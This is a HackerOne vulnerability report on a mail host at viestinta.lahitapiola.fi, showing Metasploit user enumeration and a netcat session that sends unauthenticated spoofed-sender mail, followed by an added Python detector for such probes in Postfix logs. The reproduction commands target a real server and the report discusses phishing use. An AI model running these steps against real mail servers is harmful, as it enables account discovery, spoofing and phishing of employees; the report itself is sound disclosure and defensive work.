LocalTapiola: SMTP configuration vulnerability viestinta.lahitapiola.fi

HackerOne report H1:183548, submitted by rnmx on 2016-11-20 02:12:45 (hackerone.com)

Hello guys,

I have two related SMTP vulnerabilities. I decided to put both of them under the same ticket because they are closely related.

Summary:
I discovered two SMTP vulnerabilities on the host viestinta.lahitapiola.fi. First, user enumeration is possible. To do this you can use Metasploit in the following way:

    msf > use auxiliary/scanner/smtp/smtp_enum
    msf auxiliary(smtp_enum) > set RHOSTS 83.150.127.170
    RHOSTS => 83.150.127.170
    msf auxiliary(smtp_enum) > run
    [*] 83.150.127.170:25 Banner: 220 viestinta.tapiola.fi ESMTP Postfix
    [+] 83.150.127.170:25 Users found: , adm, bin, daemon, fax, ftp, games, gdm, gopher, halt, lp, mail, news, nobody, operator, postgres, postmaster, sshd, sync, uucp, webmaster, www
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

With this step we recovered valid users on the system (please note I used the default dictionary that comes with Metasploit; I did not attempt to create a wordlist that would discover your personal email addresses, in order to limit the number of brute-force guesses).

The second vulnerability is that an attacker without any authentication can send emails through this SMTP server. Emails are limited to "@viestinta.lahitapiola.fi" addresses only. To reproduce you can use the NetCat utility:

    root@kali:~/Android/Sdk/tools# nc -nvv 83.150.127.170 25
    (UNKNOWN) [83.150.127.170] 25 (smtp) open
    220 viestinta.tapiola.fi ESMTP Postfix
    HELO 83.150.127.170
    250 viestinta.tapiola.fi
    MAIL FROM:<[email protected]>
    250 2.1.0 Ok
    RCPT TO:<[email protected]>
    550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table
    RCPT TO:<[email protected]>
    550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table
    RCPT TO:<[email protected]>
    250 2.1.5 Ok
    DATA
    354 End data with <CR><LF>.<CR><LF>
    test
    .
    250 2.0.0 Ok: queued as 98F9E3F201A1
    421 4.4.2 viestinta.tapiola.fi Error: timeout exceeded
     sent 211, rcvd 481

In the NetCat session above you can see that I used the fake email address [email protected] to send an email to [email protected] (we discovered this is a valid target in step one, user enumeration). You can see the difference when I tried to send an email to an address which does not exist: "<[email protected]>: Recipient address rejected: User unknown in local recipient table".

From my point of view there are a few problems:

  1. Information leakage (in step one an attacker can get valid system accounts/emails). Those details can be used during a later phase of an attack (probably low impact)
  2. An attacker could use this to spam internal users, maybe DoS (low risk)
  3. An attacker could use this to launch a very efficient phishing campaign. As I already stated, it is possible to send email from any address, so an attacker could pick something trusted like administrator@ or it-support@, etc. Then there is a higher chance an unsuspecting employee would click a malicious URL/executable in the email (probably medium risk)
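Both issues leave a trace on the server side: a dictionary scan of RCPT TO produces a burst of "550 5.1.1 ... User unknown in local recipient table" rejections from one client, and the envelope sender on those same lines shows whether an outside client is claiming an address in the local domain. The detector below is an added example written for this report, not code from the report or from LocalTapiola; it assumes Postfix's standard smtpd reject log format and runs over constructed sample lines (198.51.100.7 and 203.0.113.9 are documentation addresses standing in for clients).

```python
import re
from collections import defaultdict
from datetime import datetime

# Server-side trace of the "550 5.1.1 ... User unknown in local recipient table" reply
# shown in the report, as Postfix smtpd logs it. Syslog timestamps carry no year.
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: NOQUEUE: reject: "
    r"RCPT from \S+\[(?P<ip>[\d.]+)\]: 550 5\.1\.1 <(?P<rcpt>[^>]*)>: Recipient address "
    r"rejected: User unknown in local recipient table; from=<(?P<sender>[^>]*)>"
)

def parse_rejects(lines, year=2016):
    """Yield (timestamp, client_ip, rejected_recipient, envelope_sender) per reject line."""
    for m in filter(None, map(REJECT_RE.match, lines)):
        yield datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["ip"], m["rcpt"], m["sender"]

def find_enumeration(lines, threshold=5, window_s=60, year=2016):
    """Map client_ip -> most distinct unknown recipients it probed inside any window_s-second
    window, for clients reaching `threshold`. A dictionary RCPT TO scan bursts like this."""
    per_ip = defaultdict(list)
    for ts, ip, rcpt, _ in parse_rejects(lines, year):
        per_ip[ip].append((ts, rcpt))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {r for t, r in events[i:] if (t - start).total_seconds() <= window_s}
            if len(seen) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(seen))
    return flagged

def find_sender_spoofing(lines, local_domain, trusted_prefixes, year=2016):
    """Sorted (client_ip, sender) pairs where a client outside trusted_prefixes (a tuple of
    IP prefixes) claimed an envelope sender in our own domain: the spoofing the report describes."""
    return sorted({(ip, s) for _, ip, _, s in parse_rejects(lines, year)
                   if s.lower().endswith("@" + local_domain) and not ip.startswith(trusted_prefixes)})

# Constructed sample lines (not from the report): six rapid probes from 198.51.100.7 with a
# spoofed it-support@ sender, then one ordinary mistyped address from a legitimate relay.
DOMAIN = "viestinta.lahitapiola.fi"
SAMPLE_LOG = [
    f"Nov 20 02:12:{i:02d} mx postfix/smtpd[3181]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: "
    f"550 5.1.1 <{u}@{DOMAIN}>: Recipient address rejected: User unknown in local recipient table; "
    f"from=<it-support@{DOMAIN}> to=<{u}@{DOMAIN}> proto=SMTP helo=<198.51.100.7>"
    for i, u in enumerate(["accounts", "admin1", "alice", "backup", "billing", "ceo"])
] + [
    f"Nov 20 09:40:02 mx postfix/smtpd[4410]: NOQUEUE: reject: RCPT from mail.example.net[203.0.113.9]: "
    f"550 5.1.1 <jhon.doe@{DOMAIN}>: Recipient address rejected: User unknown in local recipient table; "
    f"from=<bob@example.net> to=<jhon.doe@{DOMAIN}> proto=ESMTP helo=<mail.example.net>"
]
```

Feed real `/var/log/mail.log` lines in place of SAMPLE_LOG; the single mistyped address from 203.0.113.9 stays below the threshold, while the six-probe burst is flagged and its spoofed sender reported.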

Domain: viestinta.tapiola.fi

Browsers / Apps Verified In: n/a - infrastructure problem

Steps To Reproduce: Provided in summary section.

Related reports, best practices

https://pentestlab.wordpress.com/2012/11/20/smtp-user-enumeration/ - about SMTP user enumeration